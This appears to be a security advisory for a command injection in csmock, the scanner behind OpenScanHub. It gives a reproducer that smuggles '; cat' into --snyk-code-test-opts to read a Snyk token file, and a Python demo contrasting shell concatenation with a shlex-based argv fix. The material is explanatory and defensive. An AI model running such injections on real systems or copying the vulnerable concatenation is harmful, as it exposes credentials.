csmock, which is used by the OpenScanHub (OSH) service, is vulnerable to a command injection attack. The command is isolated by mock (which internally uses systemd-nspawn) but the Snyk authentication token is accessible while the command is being executed:

    $ csmock -r rhel-9-x86_64 -t snyk -f python-certifi-2018.10.15-4.el8ost.src.rpm --snyk-code-test-opts='--help; cat /builddir/.config/configstore/snyk.json #'
    [...]
    {
      "api": "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
    }

This vulnerability was introduced by the following commit: https://github.com/csutils/csmock/commit/73eddc138c8e9c97246dd2d12ad30a2a13bea3f4
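The reproducer above works because the value of --snyk-code-test-opts reaches a shell, where ';' ends the intended command, 'cat' runs with the same access as the scanner, and '#' comments out whatever follows. The following is an added illustration, not csmock's own code and not the upstream fix: it shows the vulnerable pattern (user-supplied options spliced into a shell command string) beside a hardened form (shlex.split into an argv list, executed without a shell), run against the same injected option string. The scanner binary is replaced by "echo" so it runs offline, the snyk.json file and its token are constructed in a temporary directory, and a POSIX /bin/sh is assumed.

```python
import os
import shlex
import subprocess
import tempfile

# Stand-in for the scanner binary: "echo" just prints its arguments, so the
# example runs offline. Assumption: a POSIX /bin/sh and "echo" in PATH; the
# real csmock runs the snyk CLI here.
SCANNER = ["echo", "snyk", "code", "test"]

TOKEN = "CONSTRUCTED-TOKEN-0000"  # constructed stand-in for a Snyk API key


def build_cmd_vulnerable(user_opts: str) -> str:
    """Vulnerable pattern (hypothetical, not csmock's actual code): the
    user-controlled option string is concatenated into one shell command
    line, so ';', '#', '$(...)' and similar are interpreted by the shell."""
    return " ".join(SCANNER) + " " + user_opts


def run_vulnerable(user_opts: str) -> str:
    """Run the concatenated string through the shell and return stdout."""
    return subprocess.run(build_cmd_vulnerable(user_opts), shell=True,
                          capture_output=True, text=True).stdout


def build_cmd_hardened(user_opts: str) -> list:
    """Hardened form: tokenize the option string with shell quoting rules
    and exec the scanner directly, so every token reaches it as a literal
    argument and no shell ever sees the string."""
    return SCANNER + shlex.split(user_opts)


def run_hardened(user_opts: str) -> str:
    """Run the argv list without a shell and return stdout."""
    return subprocess.run(build_cmd_hardened(user_opts), shell=False,
                          capture_output=True, text=True).stdout


def demo() -> tuple:
    """Write a throwaway snyk.json holding the constructed token, push the
    same injected option string through both paths, and return
    (vulnerable_stdout, hardened_stdout)."""
    with tempfile.TemporaryDirectory() as tmp:
        token_file = os.path.join(tmp, "snyk.json")
        with open(token_file, "w") as fh:
            fh.write('{"api": "%s"}\n' % TOKEN)
        # Same shape as the reporter's payload: terminate the intended
        # command with ';', run an extra command, comment out the rest.
        payload = "--help; cat %s #" % token_file
        return run_vulnerable(payload), run_hardened(payload)


if __name__ == "__main__":
    leaked, safe = demo()
    print("shell=True  ->", leaked, end="")   # token file contents appear
    print("shell=False ->", safe, end="")     # payload is just echoed back
```

With shell=True the second line of output is the token file; with the argv form the scanner receives '--help;', 'cat', the path and '#' as four ordinary arguments and nothing else runs. Note that shlex.split only removes the shell from the picture: if the scanner itself has options that read or write arbitrary files, an allowlist of permitted options is the stronger control. What the upstream commit linked below actually changed is not reproduced here.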
Created csmock tracking bugs for this issue:

Affects: epel-all [bug 2270495]
Affects: fedora-all [bug 2270496]
upstream fix: https://github.com/csutils/csmock/commit/b3503d48696cb2ec8eb2fb379fb57c141f08e8da